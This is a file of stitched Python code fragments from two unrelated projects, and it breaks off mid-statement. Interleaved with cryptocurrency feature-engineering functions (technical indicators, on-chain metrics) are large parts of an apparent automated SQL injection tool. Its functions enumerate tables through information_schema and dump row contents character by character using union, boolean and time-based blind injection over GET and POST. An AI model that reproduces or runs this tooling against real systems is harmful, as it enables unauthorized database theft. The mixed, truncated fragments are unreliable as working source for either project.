logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tablename logger.debug("Start %dth table name sqli..." % (i + 1)) table_name = normal_injection( select='`table_name`', source='information_schema.tables', conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把table_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") retVal = build_injection(select="COUNT(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) tables_number = int(retVal) logger.debug( "Tables amount sqli success...The tables_number is %d..." % tables_number) logger.info("[*] tables_number: %d" % tables_number) for i in range(0, int(tables_number)): # 然后注tables_name 的 length logger.debug("Start %dth table length sqli..." % (i + 1)) retVal = build_injection( select="length(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) table_name_len = int(retVal) logger.debug( "%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tables名字 # 清空table_name table_name = "" logger.debug("Start %dth table sqli..." % (i + 1)) for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False): retVal = build_injection( select="ascii(substring(`table_name`," + repr(j + 1) + ",1))", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) table_name += chr(retVal) logger.debug( "%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把table_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") retVal = time_injection(select="COUNT(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) tables_number = int(retVal) logger.debug( "Tables amount sqli success...The tables_number is %d..." % tables_number) logger.info("[*] tables_number: %d" % tables_number) for i in range(0, int(tables_number)): # 然后注tables_number 的length logger.debug("Start %dth table length sqli..." % (i + 1)) retVal = time_injection(select="length(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) table_name_len = int(retVal) logger.debug( "%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tables名字 # 清空table_name table_name = "" logger.debug("Start %dth table sqli..." % (i + 1)) for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False): retVal = time_injection( select="ascii(substring(`table_name`," + repr(j + 1) + ",1))", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) table_name += chr(retVal) logger.debug( "%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把tables_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) self.tables_name[database_name] = tuple(tables_name) print "[*] tables_name list: ", self.tables_name
def getActive(): global active logger.info("active status %s" %(str(active))) return active
def get_content_count(self, database_name, table_name): # 开始注内容 logger.debug("Start sqli table %s content amount..." % table_name) # 先GET if self.sqlirequest == "GET": logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) # 注数据的数量 content_count = normal_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content account sqli success...The count is %d..." % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = build_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = time_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count # 然后是post elif self.sqlirequest == "POST": logger.debug("The sqlirequest is %s, start sqli contents..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) # 注数据的数量 content_count = normal_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content account sqli success...The count is %d..." % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = build_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = time_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count
from lib.log import logger if __name__ == '__main__': logger.info("test info") logger.debug("test debug") logger.warning("test warning") logger.error("test error")
def build_improved_dataset(source_index, W=10): _dataset = load_dataset(source_index, return_index=True) index = {} for _sym, entry in _dataset.items(): _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) ohlcv = _df[entry['features']['ohlcv']] ta = _df[entry['features']['ta']] ta_7 = _df[entry['features']['ta_7d']] cm = _df[entry['features']['cm']] ohlcv_stats = pd.DataFrame(index=ohlcv.index) #ohlcv_stats['volume'] = ohlcv.volume #ohlcv_stats['volume_pct'] = ohlcv.volume.pct_change() #ohlcv_stats['close_pct'] = ohlcv.close.pct_change() ohlcv_stats['day_range_pct'] = (ohlcv.high - ohlcv.low).pct_change( ) # Showld always be > 0, price oscillation range for current day ohlcv_stats[ 'direction'] = ohlcv.close - ohlcv.open # Price direction for the day green > 0, red < 0. Modulus is range. cm_picked = pd.DataFrame(index=ohlcv.index) if 'adractcnt' in cm.columns: cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change() # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change() # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change() # if 'splycur' in cm.columns: ## Correlated with volume and close # cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined) if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns: # I want to represent miners earnings (fees + issued coins) vs amount transacted in that interval cm_picked['earned_vs_transacted'] = ( cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv if 'isstotntv' in cm.columns: # isstotntv is total number of coins mined in the time interval # splycur is total number of coins mined (all time) total_mined = cm.isstotntv.rolling( 365, min_periods=7).sum() # total mined in a year cm_picked['isstot365_isstot1_pct'] = (total_mined / cm.isstotntv).pct_change() if 'splycur' in cm.columns and 'isstotntv' in cm.columns: cm_picked['splycur_isstot1_pct'] = (cm.splycur / cm.isstotntv).pct_change() if 'hashrate' in cm.columns: #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change() #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change() cm_picked['hashrate_pct'] = cm.hashrate.pct_change() if 'roi30d' in cm.columns: cm_picked['roi30d'] = cm.roi30d if 'isstotntv' in cm.columns: cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change() if 'feetotntv' in cm.columns: cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change() if 'txtfrcount' in cm.columns: cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change() cm_picked['txtfrcount_volume'] = cm.txtfrcount.pct_change() if 'vtydayret30d' in cm.columns: cm_picked['vtydayret30d'] = cm.vtydayret30d if 'isscontpctann' in cm.columns: cm_picked['isscontpctann'] = cm.isscontpctann ta_picked = pd.DataFrame(index=ta.index) # REMA / RSMA are already used and well-estabilished in ATSA, # I'm taking the pct change since i want to encode the relative movement of the ema's not their positions # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change() # ta_picked['rsma_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rsma_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rsma_20_50_pct'] = ta.rema_20_50.pct_change() # Stoch is a momentum indicator comparing a particular closing price of a security to a range of its prices # over a certain period of time. # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or # by taking a moving average of the result. # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values. # IDEA => decrease sensitivity by 3-mean and divide by 100 to get fp values ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling( 3).mean() / 100 #Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows # the relationship between two moving averages of a security’s price. # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA. # A nine-day EMA of the MACD called the "signal line," is then plotted on top of the MACD line, # which can function as a trigger for buy and sell signals. # Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security # when the MACD crosses below the signal line. # Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways, # but the more common methods are crossovers, divergences, and rapid rises/falls. signal_line = builder.exponential_moving_average(ta.macd_12_26, 9) ta_picked['macd_12_26_signal'] = ( ta.macd_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change( ) # Information about slope # PPO is identical to the moving average convergence divergence (MACD) indicator, # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference. signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9) ta_picked['ppo_12_26_signal'] = ( ta.ppo_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change( ) # Information about slope # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether # a stock is being accumulated or distributed. # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow. # This provides insight into how strong a trend is. If the price is rising but the indicator is falling # this indicates that buying or accumulation volume may not be enough to support # the price rise and a price decline could be forthcoming. # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify # divergences by simply looking at the sign of M. # Another insight would be given by the slope (ie pct_change) ta_picked['adi_pct'] = ta.adi.pct_change() ta_picked['adi_close_convergence'] = convergence_between_series( ta.adi, ohlcv.close, 3) # RSI goes from 0 to 100, values <= 20 mean BUY, while values >= 80 mean SELL. # Dividing it by 100 to get a floating point feature, makes no sense to pct_change it ta_picked['rsi_14_div100'] = ta.rsi_14 / 100 # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold # signals using both prices and volume data. The oscillator moves between 0 and 100. # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold, # although levels of 90 and 10 are also used as thresholds. # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while # the price is falling or flat, the price could start rising. ta_picked['mfi_14_div100'] = ta.mfi_14 / 100 # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators # such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator. # It measures momentum on both up and down days and does not smooth results, triggering more frequent # oversold and overbought penetrations. The indicator oscillates between +100 and -100. # Many technical traders add a 10-period moving average to this oscillator to act as a signal line. # The oscillator generates a bullish signal when it crosses above the moving average and a # bearish signal when it drops below the moving average. ta_picked['cmo_14_div100'] = ta.cmo_14 / 100 signal_line = builder.simple_moving_average(ta.cmo_14, 10) ta_picked['cmo_14_signal'] = (ta.cmo_14 - signal_line) / 100 # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price. # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying. # Despite being plotted on a price chart and measured numerically, # the actual individual quantitative value of OBV is not relevant. # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point, # meaning the real number value of OBV arbitrarily depends on the start date. # Instead, traders and analysts look to the nature of OBV movements over time; # the slope of the OBV line carries all of the weight of analysis. => We want percent change ta_picked['obv_pct'] = ta.obv.pct_change() ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change() # Strong rallies in price should see the force index rise. # During pullbacks and sideways movements, the force index will often fall because the volume # and/or the size of the price moves gets smaller. # => Encoding the percent variation could be a good idea ta_picked['fi_13_pct'] = ta.fi_13.pct_change() ta_picked['fi_50_pct'] = ta.fi_50.pct_change() # The Aroon Oscillator is a trend-following indicator that uses aspects of the # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend # and the likelihood that it will continue. # It moves between -100 and 100. A high oscillator value is an indication of an uptrend # while a low oscillator value is an indication of a downtrend. ta_picked['ao_14'] = ta.ao_14 / 100 # The average true range (ATR) is a technical analysis indicator that measures market volatility # by decomposing the entire range of an asset price for that period. # ATRP is pct_change of volatility ta_picked['atrp_14'] = ta.atrp_14 # Percentage Volume Oscillator (PVO) is momentum volume oscillator used in technical analysis # to evaluate and measure volume surges and to compare trading volume to the average longer-term volume. # PVO does not analyze price and it is based solely on volume. # It compares fast and slow volume moving averages by showing how short-term volume differs from # the average volume over longer-term. # Since it does not care a trend's factor in its calculation (only volume data are used) # this technical indicator cannot be used alone to predict changes in a trend. ta_picked['pvo_12_26'] = ta.pvo_12_26 # IGNORED: tsi, wd, adx, #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Build the dataframe with base features # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)] ohlc = ohlcv[['close', 'volume']].pct_change() lagged_ohlc = pd.concat( [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Add lagged features to the dataframe improved_df = pd.concat( [ohlcv_stats, lagged_ohlc, cm_picked, ta_picked], axis='columns', verify_integrity=True, sort=True, join='inner') # Drop the first 30 rows improved_df = improved_df[30:] # Drop columns whose values are all nan or inf with pd.option_context('mode.use_inf_as_na', True): # Set option temporarily improved_df = improved_df.dropna(axis='columns', how='all') # Save the dataframe improved_df.to_csv( 'data/datasets/all_merged/csv/{}_improved.csv'.format( _sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') improved_df.to_excel( 'data/datasets/all_merged/excel/{}_improved.xlsx'.format( _sym.lower()), index=True, index_label='Date') unlagged_df = improved_df.loc[:, [ c for c in improved_df.columns if not '_lag' in c ]] unlagged_df['target_pct'] = _target.loc[improved_df.index]['pct'] unlagged_df['target_binary_bin'] = _target.loc[ improved_df.index]['binary_bin'] plot_correlation_matrix( unlagged_df.corr(), unlagged_df.columns, title='{} Correlation matrix'.format(_sym), save_to='data/datasets/all_merged/{}_improved_corr.png'.format( _sym)) #decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df) # Add symbol to index index[_sym] = { 'csv': 'data/datasets/all_merged/csv/{}_improved.csv'.format( _sym.lower()), 'xls': 'data/datasets/all_merged/excel/{}_improved.xlsx'.format( _sym.lower()), 'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()), 'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), 'features': { 'improved': [c for c in improved_df.columns], } } logger.info('Saved {} in data/datasets/all_merged/'.format(_sym)) with open('data/datasets/all_merged/index_improved.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4) # Find common features common_features = [] for _sym, entry in index.items(): features = entry['features']['improved'] if not common_features: # if common_features is empty, common_features are all the current features common_features = features not_common_features = [] for f in common_features: # remove features from common_features which are not in features if f not in features: not_common_features.append(f) for f in not_common_features: common_features.remove(f) for _sym, entry in index.items(): entry['features']['common'] = common_features # Save index again with open('data/datasets/all_merged/index_improved.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4)
def run_content(self): if len(self.columns_name) == 0: SqliColumns.get_columns(self) # 循环解包,进入注入 for database_name in self.columns_name: for table_name in self.columns_name[database_name]: # 获取数据的条数,如果小于设置的self.content_count,那需要设置条数等于self.content_count content_counts = self.get_content_count(database_name, table_name) if content_counts == 0: logger.warning('Database %s Table %s is empty...' % (database_name, table_name)) continue elif content_counts != self.content_count: logger.debug('Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts)) self.content_count = content_counts else: pass # 声明一个表储存数据 content = PrettyTable(list(self.columns_name[database_name][table_name])) content.padding_width = 1 content.align = "r" # 每个表都要注入指定条数那么多次 for limits in xrange(self.content_count): # 声明一个队列,储存返回的值 result = Queue.Queue() # 声明线程队列、结果队列和最终插入table的数据队列 threads = [] results = [] contents = [] # 开始多线程的注入 logger.debug("Start multithreading Sqli...") for column_name in self.columns_name[database_name][table_name]: # 开始一个线程注入一个字段 try: t = threading.Thread(target=self.get_content, name='thread for %s' % column_name, args=(result, database_name, table_name, column_name, limits)) t.start() except: logger.error('Thread error...') threads.append(t) # 等待所有线程结束 for t in threads: t.join() # 注入处理返回数据,插入content中的一条 while not result.empty(): results.append(result.get()) # 处理返回的数据 for i in list(self.columns_name[database_name][table_name]): for item in results: if item[0] == i: contents.append(item[1]) else: continue # 插入数据 content_str = ','.join(contents) logger.info("Sqli success content is %s" % content_str) content.add_row(contents) # 输出表 logger.debug("Database %s Table %s sqli success..." % (database_name, table_name)) print "[*] Database %s Table %s content:" % (database_name, table_name) print content
def build_faceted_dataset(source_index, W=10): _dataset = load_dataset(source_index, return_index=True) index = {} for _sym, entry in _dataset.items(): _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) ta = _df[entry['features']['ta']] cm = _df[entry['features']['cm']] # Price history facet (Daily variation of ohlc in last W trading days) ohlc = _df[['open', 'high', 'low', 'close']].pct_change() ohlc.columns = ['open_pct', 'high_pct', 'low_pct', 'close_pct'] history_facet = pd.concat( [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Price trend facet (REMA/RSMA, MACD, AO, ADX, WD+ - WD-) trend_facet = ta[[ "rsma_5_20", "rsma_8_15", "rsma_20_50", "rema_5_20", "rema_8_15", "rema_20_50", "macd_12_26", "ao_14", "adx_14", "wd_14" ]] # Volatility facet (CMO, ATRp) volatility_facet = ta[["cmo_14", "atrp_14"]] # Volume facet (Volume pct, PVO, ADI, OBV) volume_facet = pd.concat([ _df.volume.pct_change().replace([np.inf, -np.inf], 0), ta[["pvo_12_26", "adi", "obv"]] ], axis='columns', verify_integrity=True, sort=True, join='inner') # On-chain facet cm_1 = cm.reindex(columns=[ 'adractcnt', 'txtfrvaladjntv', 'isstotntv', 'feetotntv', 'splycur', 'hashrate', 'txtfrcount' ]).pct_change() cm_2 = cm.reindex(columns=['isscontpctann']) chain_facet = pd.concat([cm_1, cm_2], axis='columns', verify_integrity=True, sort=True, join='inner') # Drop columns whose values are all nan or inf from each facet with pd.option_context('mode.use_inf_as_na', True): # Set option temporarily history_facet = history_facet.dropna(axis='columns', how='all') trend_facet = trend_facet.dropna(axis='columns', how='all') volatility_facet = volatility_facet.dropna(axis='columns', how='all') volume_facet = volume_facet.dropna(axis='columns', how='all') chain_facet = chain_facet.dropna(axis='columns', how='all') improved_df = pd.concat([ history_facet, trend_facet, volatility_facet, volume_facet, chain_facet ], axis='columns', verify_integrity=True, sort=True, join='inner') # Drop the first 30 rows improved_df = improved_df[30:] # Save the dataframe improved_df.to_csv( 'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') improved_df.to_excel( 'data/datasets/all_merged/excel/{}_faceted.xlsx'.format( _sym.lower()), index=True, index_label='Date') # Add symbol to index index[_sym] = { 'csv': 'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()), 'xls': 'data/datasets/all_merged/excel/{}_faceted.xlsx'.format( _sym.lower()), 'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()), 'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), 'features': { 'price_history': [c for c in history_facet.columns], 'trend': [c for c in trend_facet.columns], 'volatility': [c for c in volatility_facet.columns], 'volume': [c for c in volume_facet.columns], 'chain': [c for c in chain_facet.columns], } } logger.info('Saved {} in data/datasets/all_merged/'.format(_sym)) with open('data/datasets/all_merged/index_faceted.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4)
def get_content(self, result, database_name, table_name, column_name, limits): # 开始注内容 content_len = 0 logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits)) logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 注这一条的数据长度 logger.debug("Start %dth content length sqli..." % (limits + 1)) content_len = normal_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content logger.debug("Start %dth content sqli..." % (limits + 1)) content = normal_injection(select="`" + column_name + "`", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的 length retVal = build_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False): retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = time_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False): retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def build_old_dataset(): ohlcv_index = load_preprocessed('ohlcv') cm_index = load_preprocessed('coinmetrics.io') #social_index = load_preprocessed('cryptocompare_social') index = {} for _sym in ohlcv_index.keys(): if not _sym in cm_index: logger.warning('Missing blockchain data for {}'.format(_sym)) continue # if not _sym in social_index: # logger.warning('Missing social data for {}'.format(_sym)) # continue logger.info('Building {}'.format(_sym)) ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) cm = pd.read_csv(cm_index[_sym]['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) #social = pd.read_csv(social_index[_sym]['csv'], sep=',', encoding='utf-8', # index_col='Date', parse_dates=True) # Build resampled OHLCV and TA features ohlcv_3d = builder.periodic_ohlcv_pct_change(ohlcv, period=3, label=True) ohlcv_7d = builder.periodic_ohlcv_pct_change(ohlcv, period=7, label=True) ohlcv_30d = builder.periodic_ohlcv_pct_change(ohlcv, period=30, label=True) ta = builder.features_ta(ohlcv) ta_3d = builder.period_resampled_ta(ohlcv, period=3) ta_7d = builder.period_resampled_ta(ohlcv, period=7) ta_30d = builder.period_resampled_ta(ohlcv, period=30) # Build Coinmetrics blockchain stats cm_pct = feature_quality_filter(builder.pct_change(cm)) # Build Cryptocompare social stats #social_pct = feature_quality_filter(builder.pct_change(social)) # Build target percent variation target_pct = builder.target_price_variation(ohlcv['close'], periods=1) target_class = builder.target_discrete_price_variation(target_pct) target_labels = builder.target_label(target_class, labels=['SELL', 'HOLD', 'BUY']) target_bin = builder.target_binned_price_variation(target_pct, n_bins=3) target_bin_binary = builder.target_binned_price_variation(target_pct, n_bins=2) target_bin_labels = builder.target_label( target_bin, labels=['SELL', 'HOLD', 'BUY']) target_bin_binary_labels = builder.target_label(target_bin_binary, labels=['SELL', 'BUY']) # Merge all the datasets dataframes = [ ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d, cm_pct ] #, social_pct] df = pd.concat(dataframes, axis='columns', verify_integrity=True, sort=True, join='inner') target = pd.concat([ target_pct, target_class, target_bin, target_bin_binary, target_labels, target_bin_labels, target_bin_binary_labels ], axis=1) target.columns = [ 'pct', 'class', 'bin', 'binary_bin', 'labels', 'bin_labels', 'binary_bin_labels' ] target = target.loc[df.first_valid_index():df.last_valid_index()] # Save resulting dataset both in CSV and Excel format logger.info('Saving {}'.format(_sym)) df.to_csv('data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') df.to_excel('data/datasets/all_merged/excel/{}.xlsx'.format( _sym.lower()), index=True, index_label='Date') target.to_csv('data/datasets/all_merged/csv/{}_target.csv'.format( _sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') target.to_excel('data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), index=True, index_label='Date') # Add symbol to index index[_sym] = { 'csv': 'data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()), 'xls': 'data/datasets/all_merged/excel/{}.xlsx'.format(_sym.lower()), 'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()), 'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), 'features': { 'ohlcv': [c for c in ohlcv.columns], 'ohlcv_3d': [c for c in ohlcv_3d.columns], 'ohlcv_7d': [c for c in ohlcv_7d.columns], 'ohlcv_30d': [c for c in ohlcv_30d.columns], 'ta': [c for c in ta.columns], 'ta_3d': [c for c in ta_3d.columns], 'ta_7d': [c for c in ta_7d.columns], 'ta_30d': [c for c in ta_30d.columns], 'cm_pct': [c for c in cm_pct.columns], #'social_pct': [c for c in social_pct.columns], } } logger.info('Saved {} in data/datasets/all_merged/'.format(_sym)) with open('data/datasets/all_merged/index.json', 'w') as f: json.dump(index, f, sort_keys=True, 